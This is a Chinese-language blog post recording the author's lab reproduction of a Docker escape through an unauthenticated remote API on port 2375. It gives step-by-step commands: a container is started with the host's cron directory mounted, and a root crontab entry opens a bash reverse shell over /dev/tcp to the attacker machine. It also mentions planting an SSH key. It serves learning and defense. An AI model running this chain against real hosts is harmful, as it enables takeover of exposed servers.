<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="docker逃逸第一种方式——remote api未授权访问 环境： 宿主机操作系统：Ubuntu 20.04 LTS 192.168.170.129 执行攻击的主机：Kali，5.9.0-kali1-amd64 192.168.170.128 docker版本：Docker version 20.10.2, build 2291f61  步骤1、开启docker remote apidocke">
<meta property="og:type" content="article">
<meta property="og:title" content="Docker remote api逃逸复现">
<meta property="og:url" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="zyLeo&#39;s blog-饮下星光">
<meta property="og:description" content="docker逃逸第一种方式——remote api未授权访问 环境： 宿主机操作系统：Ubuntu 20.04 LTS 192.168.170.129 执行攻击的主机：Kali，5.9.0-kali1-amd64 192.168.170.128 docker版本：Docker version 20.10.2, build 2291f61  步骤1、开启docker remote apidocke">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/修改文件.png">
<meta property="og:image" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/remote-api.png">
<meta property="og:image" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/外部访问.png">
<meta property="og:image" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/644.png">
<meta property="og:image" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/secure.png">
<meta property="og:image" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/shell.png">
<meta property="article:published_time" content="2021-02-07T03:12:15.000Z">
<meta property="article:modified_time" content="2021-02-08T02:32:54.330Z">
<meta property="article:author" content="zyLeo">
<meta property="article:tag" content="Docker">
<meta property="article:tag" content="Linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/修改文件.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/me.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/me.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/me.png">
        
      
    
    <!-- title -->
    <title>Docker remote api逃逸复现</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="zyLeo's blog-饮下星光" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2021/02/08/%E5%91%8A%E5%88%AB2020/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2021/02/06/%E6%9B%B4%E6%8D%A2%E4%B8%BB%E9%A2%98%E4%B9%8Bcactus/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&text=Docker remote api逃逸复现"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&is_video=false&description=Docker remote api逃逸复现"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Docker remote api逃逸复现&body=Check out this article: https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&name=Docker remote api逃逸复现&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&t=Docker remote api逃逸复现"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A41%E3%80%81%E5%BC%80%E5%90%AFdocker-remote-api"><span class="toc-number">1.</span> <span class="toc-text">步骤1、开启docker remote api</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E9%85%8D%E7%BD%AE%EF%BC%8C%E9%87%8D%E5%90%AF%E6%9C%8D%E5%8A%A1"><span class="toc-number">1.1.</span> <span class="toc-text">修改配置，重启服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E6%95%88%E6%9E%9C"><span class="toc-number">1.2.</span> <span class="toc-text">查看效果</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A42%E3%80%81%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">2.</span> <span class="toc-text">步骤2、漏洞测试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%AE%B9%E5%99%A8"><span class="toc-number">2.1.</span> <span class="toc-text">创建容器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%94%B6%E8%8E%B7"><span class="toc-number">3.</span> <span class="toc-text">其他收获</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">参考链接：</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Docker remote api逃逸复现
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">zyLeo</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-02-07T03:12:15.000Z" itemprop="datePublished">2021-02-07</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E5%AE%9E%E8%B7%B5%E8%AE%B0%E5%BD%95/">实践记录</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Docker/" rel="tag">Docker</a>, <a class="tag-link-link" href="/tags/Linux/" rel="tag">Linux</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <blockquote>
<p>docker逃逸第一种方式——remote api未授权访问</p>
<p>环境：</p>
<p>宿主机操作系统：Ubuntu 20.04 LTS 192.168.170.129</p>
<p>执行攻击的主机：Kali，5.9.0-kali1-amd64 192.168.170.128</p>
<p>docker版本：Docker version 20.10.2, build 2291f61</p>
</blockquote>
<h2 id="步骤1、开启docker-remote-api"><a href="#步骤1、开启docker-remote-api" class="headerlink" title="步骤1、开启docker remote api"></a>步骤1、开启docker remote api</h2><p>docker remote api应该是一个提供图形化界面来简化操作的功能，通过将宿主机的docker服务通过socket的方式暴露给外部连接，使得其他主机也可以访问docker服务。</p>
<h3 id="修改配置，重启服务"><a href="#修改配置，重启服务" class="headerlink" title="修改配置，重启服务"></a>修改配置，重启服务</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">lzy@zyUb:~$ sudo nano /lib/systemd/system/docker.service</span><br><span class="line">[sudo] password <span class="keyword">for</span> lzy: </span><br><span class="line">lzy@zyUb:~$ sudo systemctl daemon-reload</span><br><span class="line">lzy@zyUb:~$ sudo service docker restart</span><br></pre></td></tr></table></figure>
<p>执行上述命令，在<code>docker.service</code>文件中添加以下红线所标出的内容(<code>-H tcp://0.0.0.0:2375</code>)</p>
<p><img src="修改文件.png" alt="修改文件"></p>
<h3 id="查看效果"><a href="#查看效果" class="headerlink" title="查看效果"></a>查看效果</h3><p>在另一台虚拟机中查看docker宿主机的2375端口，可以看到相关信息。</p>
<p><img src="remote-api.png" alt="remote-api"></p>
<p><img src="外部访问.png" alt="外部访问"></p>
<h2 id="步骤2、漏洞测试"><a href="#步骤2、漏洞测试" class="headerlink" title="步骤2、漏洞测试"></a>步骤2、漏洞测试</h2><h3 id="创建容器"><a href="#创建容器" class="headerlink" title="创建容器"></a>创建容器</h3><p>查看docker宿主机上已有的镜像</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">┌──(lzy㉿kaliForZy)-[~]</span><br><span class="line">└─$ docker -H tcp://192.168.170.129:2375 images</span><br><span class="line">REPOSITORY    TAG       IMAGE ID       CREATED         SIZE</span><br><span class="line">alpine        latest    e50c909a8df2   9 days ago      5.61MB</span><br><span class="line">ubuntu        18.04     c090eaba6b94   2 weeks ago     63.3MB</span><br><span class="line">hello-world   latest    bf756fb1ae65   13 months ago   13.3kB</span><br></pre></td></tr></table></figure>
<p>然后创建容器。因为最后反弹shell的实现方式是使用crontab计划任务，所以需要将crontab用到的文件所在路径，也就是宿主机的<code>var/spool/cron</code>目录挂载到容器中。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">┌──(lzy㉿kaliForZy)-[~]</span><br><span class="line">└─$ docker -H tcp://192.168.170.129:2375 run -it -v /var/spool/cron/:/get3cad/ c090 /bin/bash</span><br></pre></td></tr></table></figure>
<p>ubuntu的crontab相关文件的路径为<code>var/spool/cron/crontabs/root</code>，但是我自己装的虚拟机在该路径下并不存在<code>root</code>文件。所以在尽进入到容器中后，要切换到相应路径（也可以在创建容器的时候就使用<code>chroot</code>参数），然后创建文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@22b103440b66:/get3cad/crontabs<span class="comment"># touch root</span></span><br></pre></td></tr></table></figure>
<p>需要注意，创建的<code>root</code>文件默认是644权限，在crontab执行的时候会被认为是不安全模式。所以需要修改权限为<code>600</code>。</p>
<p><img src="644.png" alt="644"></p>
<p><img src="secure.png" alt="secure"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@22b103440b66:/get3cad/crontabs<span class="comment"># chmod 600 root</span></span><br></pre></td></tr></table></figure>
<p>最后往<code>root</code>文件中写入反弹shell的计划任务。同时，因为sh与bash环境的不同，需要将命令用<code>bash -c</code>包含起来。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@22b103440b66:/get3cad/crontabs<span class="comment"># echo &#x27;* * * * * bash -c &quot;bash -i  &gt;&amp;/dev/tcp/192.168.170.128/7777 0&gt;&amp;1&quot;&#x27; &gt;&gt; /get3cad/crontabs/root</span></span><br></pre></td></tr></table></figure>
<p>在攻击者主机中使用nc监听，连接到反弹的shell</p>
<p><img src="shell.png" alt="shell"></p>
<p>除反弹shell之外，在宿主机开启了ssh服务的情况下，还可以通过修改配置文件，放入攻击者公钥的情况下，实现<strong>ssh远程登录</strong>，也可以达到和上述crontab计划任务反弹shell相同的效果。</p>
<h2 id="其他收获"><a href="#其他收获" class="headerlink" title="其他收获"></a>其他收获</h2><ul>
<li>又发现了几个🐂人的博客</li>
<li>Linux中执行<code>sudo -i</code>切换到sudo模式，就能够cd到权限不够的路径，这个算是回忆吧</li>
<li>发现一个很有意思的docker镜像：<a target="_blank" rel="noopener" href="https://hub.docker.com/_/busybox">busybox</a>，小而精悍，瑞士军刀</li>
<li>资源网站：<a target="_blank" rel="noopener" href="https://www.shodan.io/">shodan</a>，搜索互联网设备，所以不要轻易将自己的端口暴露在公网。看到这个网站是因为有人没有自己搭环境实现，所以用这个网站搜索现有的开放了远程api的docker环境。从这些博客的尝试结果来看，似乎很多有这一漏洞的docker环境，都被别人植入了挖矿程序。</li>
</ul>
<p>前前后后花了4 5个小时，踩坑也是踩了蛮多的。网上的相关博客也有很多，除去内容重复的一些后，我觉得比较有参考价值的都放在下面了。</p>
<h2 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h2><ul>
<li><a target="_blank" rel="noopener" href="https://help.aliyun.com/document_detail/37517.html">Docker remote api漏洞公告</a></li>
<li><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_20453349/article/details/108260472">开启docker的remote api</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://m3lon.github.io/2019/03/18/%E8%A7%A3%E5%86%B3ubuntu-crontab%E5%8F%8D%E5%BC%B9shell%E5%A4%B1%E8%B4%A5%E7%9A%84%E9%97%AE%E9%A2%98/">踩坑：解决ubuntu-crontab反弹shell失败的问题</a></p>
</li>
<li>他人的实现：<ul>
<li><a target="_blank" rel="noopener" href="https://zgao.top/docker-remote-api%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">🐂人博客之一</a></li>
<li><a target="_blank" rel="noopener" href="https://www.ouyangxiaoze.com/2020/08/617.html">https://www.ouyangxiaoze.com/2020/08/617.html</a></li>
</ul>
</li>
</ul>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A41%E3%80%81%E5%BC%80%E5%90%AFdocker-remote-api"><span class="toc-number">1.</span> <span class="toc-text">步骤1、开启docker remote api</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E9%85%8D%E7%BD%AE%EF%BC%8C%E9%87%8D%E5%90%AF%E6%9C%8D%E5%8A%A1"><span class="toc-number">1.1.</span> <span class="toc-text">修改配置，重启服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E6%95%88%E6%9E%9C"><span class="toc-number">1.2.</span> <span class="toc-text">查看效果</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A42%E3%80%81%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">2.</span> <span class="toc-text">步骤2、漏洞测试</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BA%E5%AE%B9%E5%99%A8"><span class="toc-number">2.1.</span> <span class="toc-text">创建容器</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%94%B6%E8%8E%B7"><span class="toc-number">3.</span> <span class="toc-text">其他收获</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">参考链接：</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&text=Docker remote api逃逸复现"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&is_video=false&description=Docker remote api逃逸复现"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Docker remote api逃逸复现&body=Check out this article: https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&title=Docker remote api逃逸复现"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&name=Docker remote api逃逸复现&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://liuliuliuzy.github.io/2021/02/07/docker-remote-api%E9%80%83%E9%80%B8%E5%A4%8D%E7%8E%B0/&t=Docker remote api逃逸复现"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2021
    zyLeo
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<!-- <script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> -->

<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script>
</body>
</html>
